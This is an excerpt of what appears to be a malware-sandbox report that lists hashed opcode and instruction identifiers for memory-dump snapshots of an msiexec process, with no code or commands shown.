                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 440e9e501a911af8d08c286b2a57328fb85b4150968759c421c7e6ef505e322d
                                                                                                              • Instruction ID: 602cf9de5610a17a0f341572082585a985875297817572e6404aa3f32db93e64
                                                                                                              • Opcode Fuzzy Hash: 440e9e501a911af8d08c286b2a57328fb85b4150968759c421c7e6ef505e322d
                                                                                                              • Instruction Fuzzy Hash: 0DE08671809244DFD741DFA4E826654B7B8EB23200F1414DAC45457155E7745A60C7A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edbb5ccfebf8c911e46c3a63370590ec65beb2930354617c749de0a5b884700e
                                                                                                              • Instruction ID: 706a233c076953ddf526c4718fc77c3f874129f3d22b5de8c3239dbea2a3abb8
                                                                                                              • Opcode Fuzzy Hash: edbb5ccfebf8c911e46c3a63370590ec65beb2930354617c749de0a5b884700e
                                                                                                              • Instruction Fuzzy Hash: 06E01A75D14208DFEB84EFB8E9456ACBBF9FB49305F2094AAC80593300EB309A54CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 16ccf96e467583c98271518abc8e0037cb67be21900b0bb167b04e7d3e84be17
                                                                                                              • Instruction ID: c6f2539533f5b51477c6134ae220c2057dc70f3e424eafdfa389ac2f38392837
                                                                                                              • Opcode Fuzzy Hash: 16ccf96e467583c98271518abc8e0037cb67be21900b0bb167b04e7d3e84be17
                                                                                                              • Instruction Fuzzy Hash: 15E02631D5426A8FCB02AFB4A8101FDBF74AEC2211F5645A7C06437061EF34262EC7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5c382398cbc59d66a726cff9c74f1cb55c4ac5887a3fcdd1c25f4cd90652c8aa
                                                                                                              • Instruction ID: 3b5d18fe4618e7074adf9c84a28dfce5f314bea9ea5d3f307283a12d5b63f87b
                                                                                                              • Opcode Fuzzy Hash: 5c382398cbc59d66a726cff9c74f1cb55c4ac5887a3fcdd1c25f4cd90652c8aa
                                                                                                              • Instruction Fuzzy Hash: 7DE0C216B0E2D09FD3821775BCA10B63F60E98231534844DBD2CACE9B6C6549456D351
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0616c7e8013e3436075ced488170794643b87d60c66aa193613c488277ad3135
                                                                                                              • Instruction ID: 283285d4599376b4092f63d3006db74c7525c9038240971391f361c259cc96de
                                                                                                              • Opcode Fuzzy Hash: 0616c7e8013e3436075ced488170794643b87d60c66aa193613c488277ad3135
                                                                                                              • Instruction Fuzzy Hash: 50D09E308A93068FD3403F60B26C27A7774EB0B31BBE22D01E10DA14558B706070CB54
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 341edf257d894b46a722496c52eb64c349f57a7b51bf109264720a25564dc8f6
                                                                                                              • Instruction ID: c180e3a2f6d98dab60d299ce0d4ac4e97758c8ab9aea5d36d24cd10fd5bc3f28
                                                                                                              • Opcode Fuzzy Hash: 341edf257d894b46a722496c52eb64c349f57a7b51bf109264720a25564dc8f6
                                                                                                              • Instruction Fuzzy Hash: 56D01231D6022A978B00AAA5DC044EEBB38FED5221B514666D51437140EF702669C6E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c65387cbe5d1e0e2fbdba5ab08cf9bde22513bc1dfb2103aae739cd23601de40
                                                                                                              • Instruction ID: c932a915c92762fed4fd75658944a2d886b833c79b56007890022d16e9c44f37
                                                                                                              • Opcode Fuzzy Hash: c65387cbe5d1e0e2fbdba5ab08cf9bde22513bc1dfb2103aae739cd23601de40
                                                                                                              • Instruction Fuzzy Hash: 97D02E312082208FC7A1AF388801042B7FC9E2221030908C7D6A8C7402F3108820C3E3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd59efaf770899a54f2496d51906c076b11b59047079c80cb15d3626d22da3f9
                                                                                                              • Instruction ID: 5587663d124325494c8482c15faed20effbd39337c15315c825a1576fb69c2ec
                                                                                                              • Opcode Fuzzy Hash: fd59efaf770899a54f2496d51906c076b11b59047079c80cb15d3626d22da3f9
                                                                                                              • Instruction Fuzzy Hash: 1BE0C23144C3848FE602F764EC949897F676BD0100F0086A5C4040B699ED3E4A479B62
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 724b9e0a36260f3232e1a01f9e8ec9b7069c58a9673806b2cb19c6ebeb47f9fe
                                                                                                              • Instruction ID: fcdeaf3ea783c637160f47a47fdbf8077e3effbb10128bf2b3d9b20f4fe8a834
                                                                                                              • Opcode Fuzzy Hash: 724b9e0a36260f3232e1a01f9e8ec9b7069c58a9673806b2cb19c6ebeb47f9fe
                                                                                                              • Instruction Fuzzy Hash: 17D0673AB000089FCB149F98E8509DDF776FB9C221B048116E915A3260C6319925DB60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 30bc630c7e87a4d2cc7819c4cd496aaad19102ffde7d26d682f473b659196ad8
                                                                                                              • Instruction ID: c1dc5160ed4f51f3bd1512d3606a90a721e168556da191b48c7f3cf7b92c30fe
                                                                                                              • Opcode Fuzzy Hash: 30bc630c7e87a4d2cc7819c4cd496aaad19102ffde7d26d682f473b659196ad8
                                                                                                              • Instruction Fuzzy Hash: 76D02230804208DFD380EFA0F515B39B3BCE702205F0014A9840823200FB310E20C7A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e37b25a5b5654b04fb7d8631a4a6e589f3e6775a5799b49b7fba964a86dfd5ac
                                                                                                              • Instruction ID: effd0c5ab8274273754e17408dbdb3db46048a6abee4b97f7a14c6ed094f235e
                                                                                                              • Opcode Fuzzy Hash: e37b25a5b5654b04fb7d8631a4a6e589f3e6775a5799b49b7fba964a86dfd5ac
                                                                                                              • Instruction Fuzzy Hash: B4C012300503088BE642F7A9DC44A55732E7BC0100F408660D0050A559EE795D464B99
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                              • Instruction ID: 3bbf454b5b9fc03ef957e261e241749e4bd707ce72a56f356b2931b7ea99cff3
                                                                                                              • Opcode Fuzzy Hash: 4055f8bebb1f09e3430c6095b42012c1cc66e4952e1761faa242fe6affef8bb3
                                                                                                              • Instruction Fuzzy Hash: 3DC04834260208CFC244DB68E488D60B3E9AB48A18B2180E9E90D8B723CB32F8128A50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3873f9dcc2b11096f15330bcfa338f8c7e7d42b9cf4152e27fdb00fd960f404a
                                                                                                              • Instruction ID: 52d6b9ce506b331f289462604350a766aec091633aaff3ed38d82a77f4ea5437
                                                                                                              • Opcode Fuzzy Hash: 3873f9dcc2b11096f15330bcfa338f8c7e7d42b9cf4152e27fdb00fd960f404a
                                                                                                              • Instruction Fuzzy Hash: 28B09239208202EBCA06DB04D800C0FFFA3BFD8350F40C81CA088022B0C631C8609A52
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fbfca84fb3c9d17350e62b80a8fcee75cc40da19a2d85f97aaa412a21c30a80d
                                                                                                              • Instruction ID: c45e364b19772bef3229f4bef9a6814eb33f6c6c1c21c32d30abc26295131eb8
                                                                                                              • Opcode Fuzzy Hash: fbfca84fb3c9d17350e62b80a8fcee75cc40da19a2d85f97aaa412a21c30a80d
                                                                                                              • Instruction Fuzzy Hash: E2C19274E00218CFEB54DFA9C994B9DBBB2BF88300F1091A9D909A7365DB359E85CF50